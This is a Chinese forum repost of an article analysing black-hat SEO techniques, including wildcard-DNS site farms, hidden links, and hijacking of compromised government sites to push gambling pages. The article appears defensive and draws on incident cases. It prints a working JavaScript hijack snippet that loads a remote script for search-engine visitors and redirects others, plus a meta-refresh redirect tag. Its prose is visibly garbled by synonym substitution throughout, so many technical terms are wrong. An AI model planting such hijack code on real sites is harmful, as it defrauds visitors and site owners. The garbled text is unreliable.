黑帽SEO剖析之手法篇

2019-11-8 17:30
25610
六月清晨搅  好向圈活跃者 | |阅读模式
此系统文章总共分为四篇,别离是手法篇、工具篇、隐藏篇、总结篇;本篇为黑帽SEO之手法篇,首要先容黑帽seo的概念以及一些常用的手法。  

首先得说黑帽SEO是个老话题,我不难设想批评区一定有人吐槽此手法已经过来已久,作者有炒冷饭的怀疑。我对此概念暗示认可,但是细细回味以后,却又感应无法不解。一个早已被用烂的黑产手法,一个每年给互联网产业形成庞大损失的黑色手段,为何能一向延续至今?是技术上难以攻破,还是好处驱使下挑选置若罔闻? 

当我发现公然资本中对此黑产手法的先容百里挑一且并不具体时,缘由即不可思议了。为了营建了一个杰出的互联网情况,我在此连系现实案列对黑帽SEO这类黑产手段停止分解先容,希望可以使平安界同道引发共鸣,配合抵抗。  

由于距本文撰写已曩昔一年之久,而此时代我已不在研讨相关技术,是以若文章内容有任何误差及错误请体谅。

插曲:风趣的是,就在头几天有位朋友询问了我关于黑帽SEO方面的题目,缘由是他一位朋友运营的一个网站,页面稀里糊涂出现了赌博博彩的内容,删除后又会自动天生,其非常磨难便追求他帮手。
黑帽seo概念

SEO全称为搜索引擎优化,是指经过站内优化、站外优化等方式,提升搜索引擎收录排名。既然有SEO技术,便会有响应的从业职员,他们被称为白帽SEO,专指经过公道SEO手法,帮助提升站点排名的专业职员。  

固然有白便会有黑,由于白帽SEO优化的进程将会非常冗长,一个新站想要获得好的排名,常常需要花上几年时候做优化推行。是以一些想要快速提升本身网站排名的小伙伴,便起头在SEO上研讨做弊手法,从而诞生了黑帽SEO。黑帽SEO是指经过做弊手段,让站点快速提升排名的一类SEO技术,大概说是黑客技术,比如说:黑链(暗链)、站群、网站劫持(搜索引擎劫持)、桥页等,黑帽SEO可以快速提升排名,但究竟是违规做弊行为,轻易被K。
SEO的一些黑色手法

黑帽SEO的手法很多,而且在不竭地更新换代,其中最多见的包括操纵泛剖析做站群,入侵高权重网站挂暗链,入侵高权重网站做网页劫持,篡改高权重网站网页内容,操纵高权重网站二级目录做推行页面,点窜nginx设置做目录反向代理等等。接下来我连系现实案例,先容一些常用的手段。
操纵泛剖析建立泛二级域名站群

操纵DNS泛剖析可以快速建立站群,由于一个一级域名即可以衍生出无数个二级域名,固然一般需要借助站群工具,由于建立站群需要有很多内容分歧的页面,手工建立明显不成能。而seo职员大费周章地建立站群的目标,即是可以快速吸引大量的搜索引擎爬虫,增加网站在搜索引擎中的收录量。以下是某个泛二级域名站群案例截图:

需要说明的是,以上截图中的二级域名并不是经过一条条dns剖析记录去绑定的,剖析里面设备的是*,也就是泛剖析。而办事器端有法式大概代码去控制当机关分歧的二级域名拜候时,会返回分歧的网页内容,也就让搜索引擎误以为每个二级域名都是一个零丁的网站。  

泛剖析有很多优点,比如对用户友爱(即使输错二级域名也能跳转到方针网站),又可以更快速地被搜索引擎收录等。基于这些优点,很多站长会挑选用此方式来增加网站收录,但是假如没有妥帖的利用泛剖析能够会带来难以设想的风险。
操纵泛剖析做黑产

操纵泛剖析做黑帽seo的方式也有很多种,基因而否需要入侵网站以及dns办事器,我分为入侵法与非入侵法来先容。

入侵法

实在案例:几个月前我们发现一个重要政府网站出现了大量博彩页面,取证截图以下:

黑帽SEO分解之手法篇w2.jpg
 

经过度析我发现,此手法操纵的即是泛剖析,从截图中可以看到出现了大量此政府网站的二级甚至三级域名,而这些域名都是随机机关的,拜候后会跳转到博彩色情等不法页面,而拜候一级域名又是一般的内容。且先不分析跳转的进程中用到了哪些技术,单从泛剖析记录就不丢脸出,此网站被人篡改了dns剖析记录。我们有来由相信,黑客获得了此域名的dns剖析控制权限,并将此域名泛剖析到黑客预备好的办事器上。那末黑客这么做的目标很明显,为了让搜索引擎快速收录二级大概三级域名,从而到达引流到不法页面的目标。  

我们经过度析此政府网站被入侵特征推导出此事务进程应当是,黑客经过入侵手段获得到了该政府网站dns剖析权限(若何获得暂不成知),然后经过增加泛剖析记录,将此记录指向黑客预备好的办事器,而此办事器上有静态说话去实现经过度歧二级域名拜候,返回分歧的页面成果功用。由于政府网站自己权重很高,是以二级域名页面被百度快速收录,到达为不法页面引流的目标。这类手法的益处在于不必入侵网站,而只要获得到域名剖析权限即可(固然获得域名剖析权限也并非易事)。

非入侵法

实在案例:几天前我们发现有一个网站(sdddzg.cn)操纵泛剖析做恶意推行,检察网站特征后,我们尝试机关分歧的二级域名拜候,取证截图以下。机关二级域名拜候:

黑帽SEO分解之手法篇w3.jpg

终极返回成果:

黑帽SEO分解之手法篇w4.jpg

可以看到返回成果对网页内容以及url做了处置,当我们尝试机关分歧的二级域名拜候,发现返回成果内容都纷歧样,但是经过获得ip发现来自同一台办事器。首先我们不难想到,此域名一定是做了泛剖析的,那末它是若何控制网页内容变化的呢?检察网页源码可以看到jiang.gov.cn网页源码被嵌入到了方针网页中。

黑帽SEO分解之手法篇w5.jpg

那末实在想要实现此技术也并不难,可以在办事端上用代码实现。首先经过获得请求的二级域名地址,然后去拜候该二级域名内容获得源码镶嵌到自己的网页内。假如机关的二级域名内容不是一个完整的域名地址(如:1.sdddzg.cn),则随机返回一段源码。这类手法的益处在于不必入侵网站,只需要自己搭建一台办事器即可,但推行结果没有那末好。
操纵网站暗链

在网页中植入暗链这类手法已经相对落伍了,今朝用的也比力少,由于搜索引擎已经可以对此做弊手法停止检测。为了先容常识的完整性,此处我简单先容一下。暗链也称为黑链,即隐藏链接 hidden links,是黑帽SEO的做弊手法之一。挂暗链的目标很简单,增加网站外链,进步网站排名;实现方式首要分为几种:操纵CSS实现、操纵JS实现、操纵DIV+JS实现等。具体先容请参考:黑帽SEO之暗链
操纵高权重网站,机关关键词URL做推行

实在案例:一年前当我刚研讨黑帽SEO的时辰发现了一个风趣的黑帽SEO方式,虽然手法比力低劣老套,但却也有效果。因而在写这篇文章的时辰,我特地找了一个典型案例,与大师分享,取证截图以下。

黑帽SEO分解之手法篇w6.jpg

将URL中的参数内容显现到网页内,这原本是某些网页的一种特别功用。以往的经历告诉我这类特征假如没有处置好,能够会激发XSS缝隙,现在我不能不熟悉到,这类特征也一向被用于黑帽seo。经过在url大概post数据包(常见于搜索框功用)中机关推行关键词,再将有推行关键词页面增加到蜘蛛池中,使搜索引擎收录就能到达推行的目标。一般此种手法常被用来推行qq号,盈利网站等(类似打广告),而当我们经过搜索引擎搜索某些关键词时(如色情资本),就会显现出此页面,从而到达推行本身账号大概网站的目标,固然这只是一种推行手段,并不太触及引流。
操纵网页劫持引流

网页劫持,又叫网站劫持大概搜索引擎劫持,是今朝黑帽SEO中最风行的一种做法。其缘由可以简单概括为:易收录、难发现,易收录表示为搜索引擎尚没有很好的机制可以检测出此做弊手段,网页劫持手法仍然可以大量引流。难发现是指网页劫持手法比力隐藏,一般非技术职员很难发现它的存在。  

网页劫持从手法上可以分为办事端劫持、客户端劫持、百度快照劫持、百度搜索劫持等等;  

网页劫持的表示形式可所以劫持跳转,也可以是劫持显现的网页内容(与间接篡改网页内容分歧),今朝被普遍利用于私服、博彩等暴利行业

网页劫持实在案例

黑帽SEO分解之手法篇w7.jpg

几个月前我处置了一路网页劫持案列,原由是某政府网站上出现了博彩相关内容(解除消息页面),这明显是分歧规的。解除治理员失误增加致使,生怕此网站多数是被黑客入侵了。首先我拜候了该记录上的链接,紧接着阅读器中出现了一个一般的政府页面,而也就斯须之间,网页瞬间又跳转到了博彩网页。图一为一般政府页面:

黑帽SEO分解之手法篇w8.jpg

图二为博彩页面:

 
黑帽SEO分解之手法篇w9.jpg

可以看到博彩页面的域名为www.0980828.com,明显不是先前的政府网站域名xxxx.gov.cn。看到此现象,再连系多年平安经历,我大致可以猜测此网站应当是被网页劫持了。经过度析以上进程的数据包,不难发现在该网站前端页面被嵌入了一段不法代码。

黑帽SEO分解之手法篇w10.jpg

此代码寄存在43.250.75.61办事器上,检察该办事器信息,发现其在日本。

黑帽SEO分解之手法篇w11.jpg

而经过拜候此段代码,返回内容则是跳转到www.0980828.com网站上。

分析至此,我们不难发现,致使页面跳转的缘由即是xxxx.gov.cn网页被不法嵌入了一窜代码,而此代码可以控制拜候该网页时跳转到博彩页面。这是搜索引擎劫持最为根本且常见的一种方式,其变种甚多,范例方式也各异。最初我经过登录web办事器检察,发现了存在大量html文件被篡改,且都在文件开首被写入内部js援用。那末此入侵事务进程应当是,黑客经过web利用法式某些缝隙入侵办事器(现实是治理背景弱口令+肆意文件上传),经过批量篡改办事器静态文件实现网页劫持的目标。网页劫持的手法很是多,并不是这一个案例就能概括的,更多具体情况请继续看下文先容。

办事端劫持

办事端劫持也称为全局劫持,此手法为点窜网站静态说话文件,判定拜候来历控制返回内容,从而到达网页劫持的目标。其特点常常是经过点窜asp/aspx/php等后缀名文件,到达静态显现网页内容的结果。  

Global.asa、Global.asax、conn.asp、conn.php等文件比力特别,感化是在每次履行一个静态剧本的时辰,城市先加载该剧本,然后再履行方针剧本。所以只要在 Global.asa 中写判定用户系统信息的代码(拜候来历等),假如是蜘蛛拜候则返回关键词网页(想要推行的网站),假如是用户拜候则返回一般页面。

客户端劫持

客户端劫持的手法也很多,但最常用的就两种:js劫持与Header劫持。js劫持目标是经过向方针网页植入恶意js代码,控制网站跳转、隐藏页面内容、窗口劫持等。js植动手法是可以经过入侵办事器,间接写入源代码中;也可以写在数据库中,由于有些页面会显现数据库内容。js劫持代码案例:以下代码可以使经过搜索引擎搜索的并点击页面时,履行一段js并跳转到博彩页面;而间接输入网址拜候网页时,跳转到一个404页面。
today=new Date();today=today.getYear()+"-"+(today.getMonth()+1)+"-"+today.getDate();var regexp=/\.(sogou|so|haosou|baidu|google|youdao|yahoo|bing|gougou|118114|vnet|360|ioage|sm|sp)(\.[a-z0-9\-]+){1,2}\//ig;var where =document.referer;if(regexp.test(where)){document.write ('<script language="javascript" type="text/javascript" src="http://www.xxx.com/test.js"></script>');}else{window.location.href="../../404.htm";}
代码分析:经过referer判定来路,假如referer来路为空就是跳转到404页面,假如是搜索引擎来的referer里面也会有显现,然后在写代码控制跳转。假如只是控制实现显现分歧的内容,可以点窜php、asp代码;假如需要劫持搜索引擎搜索框,可以写JS代码来做阅读器当地跳转。固然js功用可以无穷扩大,比如可以控制一个ip一天内第一次拜候一般,其他拜候跳转等等。header劫持,就是在html代码的head中增加特别标签,代码以下:
<meta http-equiv="refresh" content="10; url=http://thief.one">
header劫持操纵的就是Meta Refresh Tag(自动转向)功用将流量引走。
间接篡改网页内容(比力低级)

有些黑客在入侵网站后,喜好间接篡改网页内容,比如放上自己的qq号,大概作为推行将网页篡改成不法页面。在此我对此做法的黑客暗示鄙夷,由于这是一种最卑劣最低级的手法。卑劣在于间接篡改网页内容,能够会致使网站没法挽回的损失;低级在于此手法极易被发现,起不到实在的引流推行感化。
操纵高权重网站二级目录

即黑客入侵网站后,在网站二级目录下建立很多自己做推行的页面。为了到达引流的目标黑客常常需要建立大量的二级目录页面,是以需要用到寄生虫法式来自动化的建立页面。此手法也需要入侵高权重网站,获得网站办事器权限。与网页劫持手法分歧的是,此手法偏重点在于操纵高权重网站本身的上风,在其目录下建立多个推行页面;而网页劫持偏重隐藏本身,其可以做到静态显现网页内容给客户。是以在现实利用中,黑客经常连系两者利用。此手法与操纵泛剖析做黑帽seo的手法还是有明显差别的,虽然一样是操纵高权重网站自己的上风,但泛剖析操纵的是二级域名,而此手法操纵的是二级目录,固然两者有殊途同归之妙。  

操纵高权重网站二级目录手法的案例与泛剖析案例类似,这里不再详述。既然我前面提到此手法常常需要寄生虫法式的配合利用,那末作甚寄生虫法式?它又有何玄机?下篇将会具体先容,敬请期待。

小结:黑产的技术再不竭进步,我们没法障碍不前!

本文来自小我博客:https://thief.one/2019/09/28/1/

*本文作者:nmask,转载请说明来自 FreeBuf.COM




上一篇:黑帽SEO之一柱擎天,SEO本来如此之简单,只是你没有把握方式
下一篇:震动黑帽的seo快排技术
温馨提示:
下载好向圈客户端可以随时随地交流学习经验,也可以和圈友发起聊天成为好友
好向圈www.kuaixunai.com是各行业经验分享的社区平台,请提供优质的经验内容分享,低质量广告内容硬广包含手机号码,微信,QQ或者二维码等形式存在可能会审核不通过,广告内容请发布在广告专区 要想被各大搜索引擎尽快收录请做好内容伪原创工作,才会有更好的推广效果,伪原创工具请百度搜索奶盘伪原创或者5118伪原创
回复
分享到 :
0 人收藏
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

泰帮动力旗下产品好向圈_同全世界分享交流经验---侵权投诉或者商务合作邮箱1623331347@qq.com 网站地图2 |网站地图

返回顶部